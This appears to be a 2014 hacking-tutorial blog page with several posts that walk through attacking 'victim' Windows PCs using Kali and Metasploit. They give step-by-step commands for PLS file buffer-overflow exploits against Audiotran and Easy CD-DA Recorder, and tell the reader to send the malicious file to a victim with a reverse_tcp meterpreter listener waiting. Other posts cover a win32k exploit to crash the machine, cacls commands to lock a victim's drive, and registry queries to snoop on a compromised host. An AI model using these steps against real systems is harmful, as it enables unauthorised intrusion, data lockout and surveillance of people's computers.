Forensics Investigation of Remote PC (Part 2)

at 4:44 AM Monday, February 24, 2014 0 comments
First Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)

Once you got the meterpreter session use ‘shell ‘command to get command prompt of the target

How to Find System Boot Time and Install Original Date

Systeminfo - Displays detailed configuration information about a computer and its operating system, including operating system configuration, security information, and product ID, and hardware properties, such as RAM, disk space, and network cards

How to Detect Last Connected USB

Reg query hklm\system\CurrentControlSet\Enum\usbstor


How to View Recent Visit Documents

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs


How to View Last Used Command in Run Dialog Box

reg query hkey_current_user\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU


How to View Installed software

Reg query hkcu/software


How to Find the All installed Drivers
Driverquery - Displays a list of all installed device drivers and their properties.


Labels: ,

How to Lock Drive of Remote Windows Victim PC

at 11:23 AM Friday, February 21, 2014 2 comments
First Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)

Once you got the meterpreter session use ‘shell ‘command to get command prompt of the target.

Type Cacls (Drive Name) /e /p everyone:n and press Enter.This will lock your “E Drive



Solution For Unlock

Now right-click on your E drive --> Properties --> Click on "Security" tab click on continue


Check the check box "Full Control" --> Click on OK. 



Parameters
FileName   Required. Displays DACLs of specified files.
/t   Changes DACLs of specified files in the current directory and all subdirectories.
/e   Edits a DACL instead of replacing it.
/c   Continues to change DACLs, ignoring errors.
/g   User: permission   Grants access rights to the specified user. The following table lists valid values for permission.

Value
Description
n
None
r
Read
w
Write
c
Change (Write)
f
Full Control
Labels: ,

Hack Remote Windows PC using Audiotran PLS File Stack Buffer Overflow

at 2:04 AM Wednesday, February 19, 2014 0 comments
This module exploits a stack-based buffer overflow in Audiotran 1.4.2.4. An attacker must send the file to victim and the victim must open the file. Alternatively, it may be possible to execute code remotely via an embedded PLS file within a browser when the PLS extension is registered to Audiotran. This alternate vector has not been tested and cannot be exercised directly with this module.

Exploit Targets
Audiotran 1.4.2.4

Requirement
Attacker: kali Linux
Victim PC: Windows 7

Open Kali terminal type msfconsole


Now type use exploit/windows/fileformat/audiotran_pls_1424
msf exploit (audiotran_pls_1424)>set payload windows/meterpreter/reverse_tcp
msf exploit (audiotran_pls_1424)>set lhost 192.168.1.6 (IP of Local Host)
msf exploit (audiotran_pls_1424)>exploit


After we successfully generate the malicious pls File, it will stored on your local computer
/root/.msf4/local/msf.pls


Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.6
exploit

Now send your msf.pls files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer


Labels: ,

Hack Remote Windows PC using Easy CD-DA Recorder PLS Buffer Overflow

at 10:45 PM Wednesday, February 12, 2014 0 comments
This module exploits stack-based buffer overflow vulnerability in Easy CD-DA Recorder 2007, caused by a long string in a playlist entry. By persuading the victim to open a specially-crafted .PLS file, a remote attacker could execute arbitrary code on the system or cause the application to crash. This Metasploit module has been tested successfully on Windows XP SP3 and Windows 7 SP1

Exploit Targets
Easy CD-DA Recorder 2007

Requirement
Attacker: kali Linux
Victim PC: Windows 7

Open Kali terminal type msfconsole


Now type use exploit/windows/fileformat/easycdda_pls_bof
msf exploit (easycdda_pls_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (easycdda_pls_bof)>set lhost 192.168.1.6 (IP of Local Host)
msf exploit (easycdda_pls_bof)>exploit


After we successfully generate the malicious pls File, it will stored on your local computer
/root/.msf4/local/msf.pls


Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.6
exploit

Now send your msf.pls files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer


Labels: ,

How to Perform Blue Screen Death Attack on Remote Windows 7 PC

at 3:10 AM Tuesday, February 11, 2014 0 comments
This Metasploit module exploits vulnerability in win32k.sys where under specific conditions TrackPopupMenuEx will pass a NULL pointer to the MNEndMenuState procedure. This Metasploit module has been tested successfully on Windows 7 SP0 and Windows 7 SP1

Exploit Targets
Windows 7

Requirement
Attacker: Kali Linux
Victim PC: Windows 7

First Hack the Victim PC Using Metaspolit (Tutorial How to Hack Remote PC)

Now Open Kali terminal type msfconsole


Now type use exploit/windows/local/ms13_081_track_popup_menu
msf exploit (ms13_081_track_popup_menu)>set payload windows/meterpreter/reverse_tcp
msf exploit (ms13_081_track_popup_menu)>set lhost 192.168.1.6 (IP of Local Host)
msf exploit (ms13_081_track_popup_menu)>set session 1
msf exploit (ms13_081_track_popup_menu)>exploit


Labels: ,
Subscribe to: Posts (Atom)